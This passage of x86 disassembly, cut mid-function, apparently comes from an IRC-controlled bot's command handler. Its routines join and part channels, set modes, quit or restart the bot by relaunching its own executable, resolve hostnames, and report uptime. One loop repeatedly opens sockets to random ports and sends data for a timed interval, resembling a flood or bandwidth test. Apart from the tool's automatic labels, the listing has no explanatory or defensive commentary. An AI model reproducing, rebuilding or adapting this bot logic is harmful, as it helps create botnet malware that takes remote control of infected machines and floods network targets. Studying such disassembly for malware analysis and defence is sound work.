push offset dword_41ED48
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41ED48
push offset aLast ; "#last"
push offset aJoinSS ; "JOIN %s %s"
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA79: ; CODE XREF: sub_40A9CF+1039�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BADB
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BA9C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BA9C: ; CODE XREF: sub_40A9CF+10C6�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jz short loc_40BAB3
mov eax, [ebp+arg_14]
mov eax, [eax+8]
mov [ebp+var_63F0], eax
jmp short loc_40BABD
; ---------------------------------------------------------------------------
loc_40BAB3: ; CODE XREF: sub_40A9CF+10D4�j
mov [ebp+var_63F0], offset byte_41DE30
loc_40BABD: ; CODE XREF: sub_40A9CF+10E2�j
push [ebp+var_63F0]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset aJoinSS ; "JOIN %s %s"
call sub_40D6CB
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BADB: ; CODE XREF: sub_40A9CF+10BD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB15
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BAFE
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BAFE: ; CODE XREF: sub_40A9CF+1128�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset aPartS ; "PART %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB15: ; CODE XREF: sub_40A9CF+111F�j
mov eax, [ebp+var_1A8]
sub eax, dword_419AA4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BB6C
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BB38
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB38: ; CODE XREF: sub_40A9CF+1162�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_5A70], eax
cmp [ebp+var_5A70], 927C0h
jle short loc_40BB5B
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB5B: ; CODE XREF: sub_40A9CF+1185�j
push [ebp+var_5A70]
call ds:dword_41709C ; Sleep
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB6C: ; CODE XREF: sub_40A9CF+1159�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A9C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBB0
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BB93
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BB98
loc_40BB93: ; CODE XREF: sub_40A9CF+11B9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BB98: ; CODE XREF: sub_40A9CF+11C2�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D4AB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBB0: ; CODE XREF: sub_40A9CF+11B0�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BBF4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40BBD7
mov eax, [ebp+arg_18]
cmp dword ptr [eax+8], 0
jnz short loc_40BBDC
loc_40BBD7: ; CODE XREF: sub_40A9CF+11FD�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBDC: ; CODE XREF: sub_40A9CF+1206�j
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BBF4: ; CODE XREF: sub_40A9CF+11F4�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BC28
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40BC17
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC17: ; CODE XREF: sub_40A9CF+1241�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC28: ; CODE XREF: sub_40A9CF+1238�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCB2
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BC84
cmp dword_41DE38, 0
jz short loc_40BC5B
mov [ebp+var_63F4], offset aOn ; "on"
jmp short loc_40BC65
; ---------------------------------------------------------------------------
loc_40BC5B: ; CODE XREF: sub_40A9CF+127E�j
mov [ebp+var_63F4], offset aOff ; "off"
loc_40BC65: ; CODE XREF: sub_40A9CF+128A�j
push [ebp+var_63F4]
push offset aDebugModeIsS_ ; "Debug mode is %s."
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BC84: ; CODE XREF: sub_40A9CF+1275�j
push offset aOn ; "on"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40BCA6
mov dword_41DE38, 1
jmp short loc_40BCAD
; ---------------------------------------------------------------------------
loc_40BCA6: ; CODE XREF: sub_40A9CF+12C9�j
and dword_41DE38, 0
loc_40BCAD: ; CODE XREF: sub_40A9CF+12D5�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCB2: ; CODE XREF: sub_40A9CF+126C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BCD9
lea eax, [ebp+var_1A4]
push eax
call sub_415DFD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCD9: ; CODE XREF: sub_40A9CF+12F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A44
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD13
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BCFC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BCFC: ; CODE XREF: sub_40A9CF+1326�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push offset aModeS ; "MODE %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD13: ; CODE XREF: sub_40A9CF+131D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A30
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A24
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BD52
mov eax, [ebp+var_1A8]
sub eax, dword_419A1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BD62
loc_40BD52: ; CODE XREF: sub_40A9CF+1357�j
; sub_40A9CF+136C�j
push offset aQuitExitting ; "QUIT :exitting"
call sub_40D6CB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BD62: ; CODE XREF: sub_40A9CF+1381�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A10
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BDC9
push 104h
lea eax, [ebp+var_5B74]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
push 0
push 0
push 0
lea eax, [ebp+var_5B74]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
cmp eax, 20h
ja short loc_40BDB6
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDB6: ; CODE XREF: sub_40A9CF+13E0�j
push offset aQuitRestarting ; "QUIT :restarting"
call sub_40D6CB
pop ecx
push 0
call ds:dword_41705C ; ExitProcess
loc_40BDC9: ; CODE XREF: sub_40A9CF+13A6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419A04
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE19
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BDEC
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BDEC: ; CODE XREF: sub_40A9CF+1416�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movzx eax, byte ptr [eax]
push eax
push offset dword_4199D4
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE19: ; CODE XREF: sub_40A9CF+140D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE38
call sub_407148
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE38: ; CODE XREF: sub_40A9CF+145D�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199BC
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BE62
mov eax, [ebp+var_1A8]
sub eax, dword_4199B0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BE7B
loc_40BE62: ; CODE XREF: sub_40A9CF+147C�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_401D6E
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BE7B: ; CODE XREF: sub_40A9CF+1491�j
mov eax, [ebp+var_1A8]
sub eax, dword_4199A8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEA9
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40CEB0
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEA9: ; CODE XREF: sub_40A9CF+14BF�j
mov eax, [ebp+var_1A8]
sub eax, dword_41999C
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40BED3
mov eax, [ebp+var_1A8]
sub eax, dword_41998C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40BEFD
loc_40BED3: ; CODE XREF: sub_40A9CF+14ED�j
push offset aQuitChangingSe ; "QUIT :changing server"
call sub_40D6CB
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D366
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40BEFD: ; CODE XREF: sub_40A9CF+1502�j
mov eax, [ebp+var_1A8]
sub eax, dword_41996C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C0D9
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40BF29
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE30
loc_40BF29: ; CODE XREF: sub_40A9CF+154E�j
lea eax, [ebp+var_5B78]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_40C0BA
mov eax, [ebp+var_5B78]
mov [ebp+var_5B7C], eax
loc_40BF54: ; CODE XREF: sub_40A9CF+16D8�j
cmp [ebp+var_5B7C], 0
jz loc_40C0AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+10h]
mov eax, [ebp+var_5B7C]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz loc_40C098
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 2
jnz short loc_40BFEA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40BFBA
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63F8], eax
jmp short loc_40BFC4
; ---------------------------------------------------------------------------
loc_40BFBA: ; CODE XREF: sub_40A9CF+15DB�j
mov [ebp+var_63F8], offset dword_419968
loc_40BFC4: ; CODE XREF: sub_40A9CF+15E9�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63F8]
push offset dword_419944
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C08D
; ---------------------------------------------------------------------------
loc_40BFEA: ; CODE XREF: sub_40A9CF+15CE�j
mov eax, [ebp+var_5B7C]
cmp dword ptr [eax+4], 17h
jnz short loc_40C03E
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C011
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_63FC], eax
jmp short loc_40C01B
; ---------------------------------------------------------------------------
loc_40C011: ; CODE XREF: sub_40A9CF+1632�j
mov [ebp+var_63FC], offset dword_419968
loc_40C01B: ; CODE XREF: sub_40A9CF+1640�j
lea eax, [ebp+var_5F80]
push eax
push [ebp+var_63FC]
push offset dword_419920
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_40C08D
; ---------------------------------------------------------------------------
loc_40C03E: ; CODE XREF: sub_40A9CF+1625�j
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C059
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6400], eax
jmp short loc_40C063
; ---------------------------------------------------------------------------
loc_40C059: ; CODE XREF: sub_40A9CF+167A�j
mov [ebp+var_6400], offset dword_419968
loc_40C063: ; CODE XREF: sub_40A9CF+1688�j
lea eax, [ebp+var_5F80]
push eax
mov eax, [ebp+var_5B7C]
push dword ptr [eax+4]
push [ebp+var_6400]
push offset dword_4198EC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
loc_40C08D: ; CODE XREF: sub_40A9CF+1616�j
; sub_40A9CF+166D�j
push 3E8h
call ds:dword_41709C ; Sleep
loc_40C098: ; CODE XREF: sub_40A9CF+15BE�j
mov eax, [ebp+var_5B7C]
mov eax, [eax+1Ch]
mov [ebp+var_5B7C], eax
jmp loc_40BF54
; ---------------------------------------------------------------------------
loc_40C0AC: ; CODE XREF: sub_40A9CF+158C�j
push [ebp+var_5B78]
call dword_41DE8C ; freeaddrinfo
jmp short loc_40C0D4
; ---------------------------------------------------------------------------
loc_40C0BA: ; CODE XREF: sub_40A9CF+1573�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C0D4: ; CODE XREF: sub_40A9CF+16E9�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C0D9: ; CODE XREF: sub_40A9CF+1541�j
mov eax, [ebp+var_1A8]
sub eax, dword_4198C4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C1D4
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40C105
mov eax, [ebp+arg_14]
mov dword ptr [eax+4], offset byte_41DE30
loc_40C105: ; CODE XREF: sub_40A9CF+172A�j
lea eax, [ebp+var_5F84]
push eax
push 0
push 0
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call dword_41DE84 ; getaddrinfo
test eax, eax
jnz loc_40C1B5
push 4
push 0
push 0
push 401h
lea eax, [ebp+var_6388]
push eax
mov eax, [ebp+var_5F84]
push dword ptr [eax+10h]
mov eax, [ebp+var_5F84]
push dword ptr [eax+18h]
call dword_41DE88 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call dword_41DE8C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call ds:dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call ds:dword_41720C ; send
push [ebp+var_63B8]
call ds:dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DC34
push 3B6h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset a08x ; "%08X"
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DE30
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DE30
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DE30
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DE30
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DE30
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DE30
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
